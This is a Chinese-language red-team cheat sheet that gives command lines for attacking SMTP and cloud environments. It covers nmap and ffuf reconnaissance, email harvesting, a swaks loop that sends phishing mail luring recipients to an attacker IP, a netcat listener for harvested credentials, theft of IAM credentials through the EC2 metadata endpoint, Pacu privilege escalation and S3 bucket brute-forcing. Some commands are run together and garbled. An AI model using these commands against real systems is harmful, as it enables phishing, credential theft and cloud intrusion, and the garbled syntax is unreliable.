红队 - 攻击SMTP
- 信息收集 |
Techniques: Nmap Scanning
nmap -sV -sC -v -p- --min-rate=10000<Target IP>- 子域枚举 |
Techniques: Using ffuf for subdomain Brute-Forcing
ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u https://TargetDomain.com -H"Host: FUZZ.TargetDomain.com"- 电子邮件收集 |
Techniques: Extracting Email from Web Page
#Manually visit Target Domain / SubDomain and extract emails to mails.txt- 电子邮件互动 |
Techniques: Sending Emails with swaks
whilereadmail;doswaks --to$mail--from support@TargetDomain.com --header"Subject: Credentials"--body"goto http://10.10.14.4"--server 10.10.10.197;done<mails.txt- 凭证收获 |
Techniques: Netcat Listener
nc -lvp 80#to listen for incoming connections- 访问SMTP |
Techniques: Using evolution to Access SMTP
apt install evolution#and with Configure SMTP server 10.10.10.197 and email user@TargetDomain.com- 探索已发送物品 |
Techniques: Checking Sent Emails
#Check sent items for any useful information afther accessing the SMTP server通过EC2元数据进行权限升级
方法一
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<role_name>curl: 用于执行HTTP请求的命令行工具。http://169.254.169.254/latest/meta-data/iam/security-credentials/<role_name>:元数据服务的URL端点,用于获取指定IAM角色的安全凭证。用IAM职位的名称替换<role_name>。
方法二
python3 pacu.py --method escalate_iam_roles --profile<aws_profile>--regions<aws_region>--instances<instance_id>- 在此命令中,pacu.py 脚本与该方法一起执行,该方法专门设计用于提升与 IAM 角色相关的权限。
escalate_iam_roles --profile选项指定用于认证的 AWS 配置文件。--regions选项指定了要针对的AWS区域。--instances选项用于指定将要升级IAM角色的目标EC2实例ID。
不安全的接口和API(面向云端)
方法一
python3 cloudhunter.py --write-test --open-only http://example.com--write-test: 该选项告诉脚本写入测试文件。测试文件的目的和内容取决于 cloudhunter.py 脚本的实现方式。--open-only:该选项指定脚本仅检查目标URL上的开放端口或服务,此时目标URL为 http://example.com。它表示脚本不会尝试执行任何其他类型的扫描或分析。http://example.com: 这是脚本将对其进行开放端口检查的目标URL。在这个例子中,它被设置为 http://example.com,但在实际场景中,你通常会用你想测试的实际URL替换它。
方法二
cf enum<domain>- 通过用实际域名替换,命令会尝试使用 cf 枚举工具检索该域名的特定信息。收集的信息类型及呈现方式取决于所用工具的具体实现方式。
<domain>
方法三
ffuf -w /path/to/seclists/Discovery/Web-Content/api.txt -u https://example.com/FUZZ -mc allffuf: 这是执行的工具或命令名称。-w /path/to/seclists/Discovery/Web-Content/api.txt: 该选项指定用于模糊的单词表(-w)。wordlist 文件位于 /path/to/seclists/Discovery/Web-Content/api.txt,包含将针对目标 URL 进行测试的潜在输入值或负载列表。-u https://example.com/FUZZ:该选项定义了模糊过程的目标URL(-u)。字符串 FUZZ 作为占位符,在模糊过程中会被单词列表中的值替换。此时目标URL为 https://example.com/FUZZ,FUZZ将被替换为单词列表中不同的负载。-mc all: 该选项指定目标服务器响应的匹配条件(-mc)。在这种情况下,所有响应,无论 HTTP 状态码如何,都将被视为有效匹配。
方法4
php s3-buckets-bruteforcer.php --bucket gwen001-test002- 通过提供参数后加上特定值(gwen001-test002),脚本将尝试以该值为目标对亚马逊S3桶进行暴力破解。脚本很可能包含了遍历不同桶名称的逻辑,尝试每个,直到找到有效或可访问的桶。
--bucket